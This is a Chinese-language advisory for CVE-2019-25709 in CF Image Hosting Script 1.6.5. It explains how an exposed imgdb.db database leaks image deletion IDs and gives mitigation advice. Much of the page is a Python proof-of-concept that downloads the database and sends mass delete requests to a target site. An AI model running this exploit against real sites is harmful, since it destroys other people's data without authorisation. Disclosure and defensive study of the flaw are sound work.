CVE-2019-25709 CF Image Hosting Script数据库泄露漏洞

漏洞信息

漏洞编号

CVE-2019-25709

漏洞类型

敏感信息泄露

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CF Image Hosting Script

漏洞概述

CF Image Hosting Script 1.6.5版本存在严重的安全漏洞，允许未经身份验证的攻击者直接下载并解码应用程序数据库。由于系统未能妥善保护存储在upload/data目录下的imgdb.db文件，攻击者无需任何权限即可通过网络访问获取该数据库。数据库中包含以明文存储的图片删除ID，攻击者提取这些ID后，可利用d参数向服务器发送请求，从而删除系统中的所有图片。此漏洞严重威胁数据的机密性和完整性。

技术细节

该漏洞的根本原因是Web服务器对敏感数据文件的访问控制缺失。CF Image Hosting Script将SQLite数据库文件（imgdb.db）存储在Web可访问的目录（upload/data）中，且未配置适当的访问限制。攻击者可利用此漏洞分三个步骤实施攻击：首先，直接通过HTTP GET请求访问/imgdb.db路径下载整个数据库文件；其次，在本地使用SQLite工具或脚本解析下载的数据库文件，提取其中存储的用于删除图片的标识符（delete_id），这些ID在数据库中以明文形式存在；最后，攻击者构造包含d参数的恶意请求，将提取的ID发送给服务器，服务器验证通过后执行删除操作，导致图片资源被恶意清除。整个过程无需用户交互或管理员权限。

攻击链分析

STEP 1

步骤1：信息收集

攻击者探测目标站点，直接访问/upload/data/imgdb.db路径。

STEP 2

步骤2：数据获取

成功下载包含敏感信息的SQLite数据库文件（imgdb.db）。

STEP 3

步骤3：数据解析

在本地解析数据库，提取存储在明文中的图片删除ID。

STEP 4

步骤4：漏洞利用

使用提取的ID构造包含d参数的请求，发送至服务器以删除图片。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sqlite3
import os

def exploit(target_url):
    # Step 1: Download the database file
    db_url = f"{target_url}/upload/data/imgdb.db"
    print(f"[*] Attempting to download database from {db_url}...")
    
    try:
        response = requests.get(db_url)
        if response.status_code == 200:
            print("[+] Database downloaded successfully.")
            db_file = "imgdb.db"
            with open(db_file, 'wb') as f:
                f.write(response.content)
        else:
            print("[-] Failed to download database.")
            return
    except Exception as e:
        print(f"[-] Error during download: {e}")
        return

    # Step 2: Parse database and extract delete IDs
    print("[*] Parsing database to extract delete IDs...")
    delete_ids = []
    try:
        conn = sqlite3.connect(db_file)
        cursor = conn.cursor()
        # Adjust table/column names based on actual database schema
        cursor.execute("SELECT rowid FROM images") 
        rows = cursor.fetchall()
        for row in rows:
            delete_ids.append(row[0])
        conn.close()
    except Exception as e:
        print(f"[-] Error parsing database: {e}")
        if os.path.exists(db_file):
            os.remove(db_file)
        return

    print(f"[+] Found {len(delete_ids)} delete IDs.")

    # Step 3: Delete images using extracted IDs
    print("[*] Sending delete requests...")
    for delete_id in delete_ids:
        delete_url = f"{target_url}/index.php?d={delete_id}"
        # Sending request to delete the image
        requests.get(delete_url)
        print(f"[+] Sent delete request for ID: {delete_id}")

    # Cleanup
    if os.path.exists(db_file):
        os.remove(db_file)
    print("[*] Exploitation completed.")

if __name__ == "__main__":
    target = "http://example.com" # Replace with actual target
    exploit(target)

影响范围

CF Image Hosting Script 1.6.5

防御指南

临时缓解措施

如果不能立即升级，应通过Web服务器配置严格限制对/upload/data目录及其子目录的匿名访问，特别是禁止下载.db文件。同时，检查数据库中是否已被非法访问，并重置相关的删除凭证。